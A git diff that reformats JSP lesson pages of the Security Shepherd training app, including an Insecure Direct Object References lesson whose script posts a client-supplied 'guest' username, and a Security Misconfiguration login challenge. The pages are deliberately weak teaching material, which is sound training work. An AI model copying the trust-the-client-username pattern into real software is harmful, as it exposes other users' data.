-             * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-             *
-             * @author Sean Duggan
-             */
+	/*
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 *
+	 * @author Sean Duggan
+	 */
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-
-        <br/>
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br/> <input type="button"
-                     value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
 
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/>
+			<br />
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
 
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br>
-    <%= mobile.getString("mobileBlurb.vmLink.1") + " CSInjection.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br />
 
-    <script>
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br>
+		<%= mobile.getString("mobileBlurb.vmLink.1") + " CSInjection.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
 
-        $('#hideLesson').click(function () {
-            $("#lessonIntro").hide("slow", function () {
-                $("#showLesson").show("fast");
-            });
-        });
-
-        $("#showLesson").click(function () {
-            $('#showLesson').hide("fast", function () {
-                $("#lessonIntro").show("slow");
-            });
-        });
-    </script>
-    <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-    <% } %>
-    </p>
-</div>
+		<script>
+				
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+		</p>
+	</div>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+		}
+		else
+		{
+			response.sendRedirect("../loggedOutSheep.html");
+		}
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.jsp b/src/main/webapp/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.jsp
index 26a877a96..27292ea01 100644
--- a/src/main/webapp/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.jsp
+++ b/src/main/webapp/lessons/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.jsp
@@ -1,192 +1,200 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
 
-    final String LEVEL_NAME = "Insecure Direct Object References Lesson";
-    final String LEVEL_HASH = "fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100";
+	final String LEVEL_NAME = "Insecure Direct Object References Lesson";
+	final String LEVEL_HASH = "fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.insecure_direct_object_ref." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.quesetion.insecure_direct_object_ref");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.insecure_direct_object_ref." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.quesetion.insecure_direct_object_ref");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.insecureDirectObjectReferences");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.insecureDirectObjectReferences");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	if (request.getSession() != null)
+	 {
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
-%>
+ %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info2") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info3") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            Insecure Direct Object References
-        </a> <br/> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info2") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info3") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				Insecure Direct Object References
+			</a> <br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
 
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.refresh") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button"
-                               value="<%= bundle.getString("sign.hint") %>?" id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.refresh") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button"
+								value="<%= bundle.getString("sign.hint") %>?" id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv">
-        <h2 class='title'><%= bundle.getString("challenge.userTitle") %>:
-            <%= bundle.getString("challenge.guest") %>
-        </h2>
-        <table>
-            <tr>
-                <th><%= bundle.getString("challenge.age") %>:</th>
-                <td>22</td>
-            </tr>
-            <tr>
-                <th><%= bundle.getString("challenge.address") %>:</th>
-                <td>54 Kevin Street, Dublin</td>
-            </tr>
-            <tr>
-                <th><%= bundle.getString("challenge.email") %>:</th>
-                <td>guestAccount@securityShepherd.com</td>
-            </tr>
-            <tr>
-                <th><%= bundle.getString("challenge.message") %>:</th>
-                <td><%= bundle.getString("challenge.noMessage") %>
-                </td>
-            </tr>
-        </table>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= LEVEL_HASH %>",
-                data: {
-                    username: "guest"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
+		<div id="resultsDiv">
+			<h2 class='title'><%= bundle.getString("challenge.userTitle") %>:
+				<%= bundle.getString("challenge.guest") %></h2>
+			<table>
+				<tr>
+					<th><%= bundle.getString("challenge.age") %>:</th>
+					<td>22</td>
+				</tr>
+				<tr>
+					<th><%= bundle.getString("challenge.address") %>:</th>
+					<td>54 Kevin Street, Dublin</td>
+				</tr>
+				<tr>
+					<th><%= bundle.getString("challenge.email") %>:</th>
+					<td>guestAccount@securityShepherd.com</td>
+				</tr>
+				<tr>
+					<th><%= bundle.getString("challenge.message") %>:</th>
+					<td><%= bundle.getString("challenge.noMessage") %></td>
+				</tr>
+			</table>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= LEVEL_HASH %>",
+						data: {
+							username: "guest"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
 
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.jsp b/src/main/webapp/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.jsp
index 971c94fd6..c2064f0e9 100644
--- a/src/main/webapp/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.jsp
+++ b/src/main/webapp/lessons/fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833.jsp
@@ -1,209 +1,217 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
 
-    final String LEVEL_NAME = "Security Misconfiguration";
-    final String LEVEL_HASH = "fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833";
+	final String LEVEL_NAME = "Security Misconfiguration";
+	final String LEVEL_HASH = "fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.security_misconfig." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.security_misconfig");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.security_misconfig." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.security_misconfig");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.securityMisconfiguration");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.securityMisconfiguration");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	 if (request.getSession() != null)
+	 {
+	     HttpSession ses = request.getSession();
+	     //Getting CSRF Token from client
+		 Cookie tokenCookie = null;
+		 try
+		 {
+		     tokenCookie = Validate.getToken(request.getCookies());
+		 }
+		 catch(Exception htmlE)
+		 {
+		     ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		 }
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
-%>
+ %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            <%= LEVEL_NAME %>
-        </a> <br/> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <div id="hint" style="display: none;">
-        <h2 class="title"><%= bundle.getString("challenge.hintHeader") %>
-        </h2>
-        <%= bundle.getString("challenge.hint") %>
-        <br/> <br/>
-    </div>
-    <br/> <br/>
-    <div id="badData"></div>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.userName") %>
-                </td>
-                <td><input type="text" id="userName" autocomplete="off"/></td>
-            <tr>
-                <td><%= bundle.getString("challenge.password") %>
-                </td>
-                <td><input type="password" id="userPass" autocomplete="off"/>
-                </td>
-            <tr>
-                <td colspan="2">
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.signIn") %> "/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button"
-                               value="<%= bundle.getString("button.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        console.log("Counter: " + counter);
-        var theUserName = $("#userName").val();
-        var theUserPass = $("#userPass").val();
-        var theError = "";
-        $("#badData").hide("fast");
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= LEVEL_HASH %>",
-                data: {
-                    userName: theUserName,
-                    userPass: theUserPass
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-        if (counter == 3) {
-            console.log("Showing Hint Button");
-            $("#hintButton").show("slow");
-        }
-        if (theError.length > 0) {
-            $("#badData").html("<p> <%= bundle.getString("error.occurred") %>: " + theError + "</p>");
-            $("#badData").show("slow");
-        }
-    });
-
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				<%= LEVEL_NAME %>
+			</a> <br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
 
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<div id="hint" style="display: none;">
+			<h2 class="title"><%= bundle.getString("challenge.hintHeader") %></h2>
+			<%= bundle.getString("challenge.hint") %>
+			<br /> <br />
+		</div>
+		<br /> <br />
+		<div id="badData"></div>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.userName") %></td>
+					<td><input type="text" id="userName" autocomplete="off" /></td>
+				<tr>
+					<td><%= bundle.getString("challenge.password") %></td>
+					<td><input type="password" id="userPass" autocomplete="off" />
+					</td>
+				<tr>
+					<td colspan="2">
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.signIn") %> " />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button"
+								value="<%= bundle.getString("button.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
